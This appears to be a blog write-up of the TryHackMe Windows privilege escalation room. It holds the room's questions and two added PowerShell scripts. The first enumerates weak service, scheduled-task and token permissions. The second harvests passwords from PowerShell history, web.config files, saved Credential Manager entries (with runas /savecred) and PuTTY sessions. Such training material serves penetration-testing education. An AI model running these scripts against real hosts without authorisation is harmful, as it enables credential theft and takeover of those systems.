In this post, we cover the most common Windows privilege escalation techniques as part of the TryHackMe Windows Privesc room. Common Windows privilege escalation techniques include abusing Windows services, harvesting credentials, and exploiting out-of-date or unpatched software.


During a penetration test, you will often gain access to Windows hosts as an unprivileged user. Unprivileged users have limited access, typically only to their own files and folders, and no means to perform administrative tasks on the host, which prevents you from taking complete control of your target.

This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account, where possible.

Simply put, privilege escalation consists of taking the access we already have to a host as “user A” and leveraging it to gain access as “user B” by abusing a weakness in the target system. While we will usually want “user B” to have administrative rights, there might be situations where we’ll need to escalate into other unprivileged accounts before actually getting administrative privileges.

Gaining access to different accounts can be as simple as finding credentials in text files or spreadsheets left unsecured by some careless user, but that won’t always be the case. Depending on the situation, we might need to abuse some of the following weaknesses:

  • Misconfigurations on Windows services or scheduled tasks
  • Excessive privileges assigned to our account
  • Vulnerable software
  • Missing Windows security patches
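A read-only triage of the first two weakness classes (service and scheduled-task misconfigurations, excessive token privileges), written here as an added example rather than code from the room or the post, to be run from the unprivileged user's own PowerShell session. It assumes the account's relevant group memberships are limited to Users, Everyone and Authenticated Users (extend the list from the output of whoami /groups otherwise) and that the ScheduledTasks module is present (Windows 8 / Server 2012 and later).

```powershell
# Added example (not code from the TryHackMe room): read-only triage of service, scheduled-task
# and token-privilege weaknesses from an unprivileged shell. It changes nothing on the host.
# Assumption: the identities below are the only ones whose ACEs are treated as "ours".

# --- Excessive privileges on our own token --------------------------------------------------
# Look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeBackupPrivilege,
# SeRestorePrivilege, SeTakeOwnershipPrivilege or SeDebugPrivilege. "Disabled" only means
# "not enabled yet": a process can enable a privilege that its token holds.
whoami /priv
whoami /groups

# Does one of the interesting identities hold write, modify or full control on $Path?
function Test-Writable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $identities = @("$env:USERDOMAIN\$env:USERNAME", 'BUILTIN\Users', 'Everyone',
                    'NT AUTHORITY\Authenticated Users')
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs (e.g. "Authenticated Users: Modify" on C:\, which applies to
        # subfolders and files only) do not grant anything on the object itself.
        if ($ace.PropagationFlags.HasFlag([System.Security.AccessControl.PropagationFlags]::InheritOnly)) { continue }
        if ($identities -notcontains $ace.IdentityReference.Value) { continue }
        # Generic rights show up as a number here and are deliberately not matched.
        if ("$($ace.FileSystemRights)" -match '\bWrite\b|WriteData|Modify|FullControl') { return $true }
    }
    return $false
}

# --- Service misconfigurations --------------------------------------------------------------
Get-CimInstance Win32_Service | ForEach-Object {
    $cmd = $_.PathName
    if (-not $cmd) { return }
    $quoted = $cmd.StartsWith('"')
    # Binary path: the quoted part, or everything up to the first ".exe" when unquoted.
    if ($quoted) { $bin = $cmd.Split('"')[1] } else { $bin = $cmd -replace '(?i)(\.exe).*$', '$1' }
    $issues = @()
    if (Test-Writable $bin) { $issues += 'binary writable' }
    $dir = Split-Path -Path $bin -Parent
    if ($dir -and (Test-Writable $dir)) { $issues += "binary directory writable ($dir)" }
    if (-not $quoted -and $bin.Contains(' ')) {
        # Unquoted path with spaces: the service manager tries C:\Program.exe, then
        # C:\Program Files\Some.exe, ... before the real binary. A writable parent = hijack.
        $parts = $bin -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $hijackDir = Split-Path -Path $candidate -Parent
            if ($hijackDir -and (Test-Writable $hijackDir)) { $issues += "unquoted path, can plant $candidate" }
        }
    }
    if ($issues) {
        [PSCustomObject]@{ Service = $_.Name; RunsAs = $_.StartName; StartMode = $_.StartMode
                           Issue = ($issues -join '; ') }
    }
} | Format-Table -AutoSize -Wrap

# --- Scheduled tasks whose action we can overwrite ------------------------------------------
# Only tasks the current user is allowed to read are listed; the action runs as RunsAs.
Get-ScheduledTask | Where-Object State -ne 'Disabled' | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $exe = [Environment]::ExpandEnvironmentVariables(($action.Execute -replace '"', ''))
        if ($exe -and (Test-Writable $exe)) {
            [PSCustomObject]@{ Task = $task.TaskName; RunsAs = $task.Principal.UserId; Action = $exe }
        }
    }
} | Format-Table -AutoSize
```

The script stops at the weak permission. Whether the finding is exploitable depends on a second check it does not make: that the current user can restart the service (sc.exe sdshow on the service, or simply waiting for a reboot if it is set to start automatically) or that the task is triggered while the planted binary is in place. The last two list items, vulnerable software and missing patches, are version questions rather than permission questions; systeminfo and the installed-program registry keys tell you what is present, and matching that against known issues is a lookup, not a script.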

Room Answers

Users that can change system configurations are part of which group?

The SYSTEM account has more privileges than the Administrator user (aye/nay)

A password for the julia.jones user has been left in the PowerShell history. What is the password?

A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?

There is a saved password in your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.

Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
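The four credential sources the questions above point at (PowerShell history, IIS web.config files, Credential Manager entries usable with runas, and saved PuTTY sessions), swept from one PowerShell session as an added example that is not code from the room or the post. The file, registry and cmdkey locations are the standard Windows and PuTTY ones; mike.katz is the account named in the question above, and the flag path in the runas comment is an assumed one.

```powershell
# Added example (not code from the TryHackMe room): one pass over the usual places an
# unprivileged user can read other people's credentials from. Read-only except for the
# optional runas line, which is left as a comment.

# 1. PSReadLine history. Every interactive PowerShell session appends to this file, so it
#    survives "cls" and even closing the window. Prefer the path PSReadLine reports.
if (Get-Command Get-PSReadLineOption -ErrorAction SilentlyContinue) {
    $histFile = (Get-PSReadLineOption).HistorySavePath
} else {
    $histFile = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
}
if (Test-Path $histFile) {
    Write-Host "[*] PowerShell history ($histFile):"
    Select-String -Path $histFile -Pattern 'pass|pwd|cred|secret|-p ' |
        ForEach-Object { "    line $($_.LineNumber): $($_.Line)" }
}

# 2. IIS web.config files. Connection strings and appSettings are a classic home for the
#    database user's password; the framework-level web.config is also worth reading.
$configRoots = @('C:\inetpub\wwwroot',
                 "$env:windir\Microsoft.NET\Framework64",
                 "$env:windir\Microsoft.NET\Framework")
foreach ($root in $configRoots) {
    if (-not (Test-Path $root)) { continue }
    Get-ChildItem -Path $root -Filter 'web.config' -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hits = Select-String -Path $_.FullName -Pattern 'connectionString|password|pwd='
            if ($hits) {
                Write-Host "[*] $($_.FullName):"
                $hits | ForEach-Object { '    ' + $_.Line.Trim() }
            }
        }
}

# 3. Credential Manager. cmdkey shows targets and user names, never the secret, but runas
#    /savecred will use the stored secret without prompting, which is enough for a shell.
Write-Host '[*] Saved credentials (cmdkey /list):'
cmdkey /list
# From an RDP session this opens a new cmd window as mike.katz:
#   runas /savecred /user:mike.katz cmd.exe
# From a non-interactive shell there is no window to see, so redirect the output instead
# (flag path assumed for the example):
#   runas /savecred /user:mike.katz "cmd.exe /c type C:\Users\mike.katz\Desktop\flag.txt > C:\Users\Public\flag.txt"

# 4. Saved PuTTY sessions. The proxy password, when set, is stored in clear text per session.
$puttyKey = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
if (Test-Path $puttyKey) {
    Write-Host '[*] PuTTY sessions:'
    Get-ChildItem $puttyKey | ForEach-Object {
        $s = Get-ItemProperty -Path $_.PSPath
        [PSCustomObject]@{
            Session       = $_.PSChildName
            HostName      = $s.HostName
            UserName      = $s.UserName
            ProxyUsername = $s.ProxyUsername
            ProxyPassword = $s.ProxyPassword
        }
    } | Format-Table -AutoSize
}
```

Two caveats worth keeping in mind: the history file belongs to the current user only, so other users' histories are only reachable if their profile directory happens to be readable, and the web.config search matches on keywords, so a password stored under a non-obvious attribute name still needs a manual read of the file.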

What is the taskusr1 flag?

Get the flag on svcusr1’s desktop.

Get the flag on svcusr2’s desktop.

Get the flag on the Administrator’s desktop.

Get the flag on the Administrator’s desktop.

Get the flag on the Administrator’s desktop.

Video Walkthrough

About the Author

Cybersecurity trainer. MS in Cybersecurity. Expertise in the healthcare and finance industries. Penetration tester and compliance auditor.
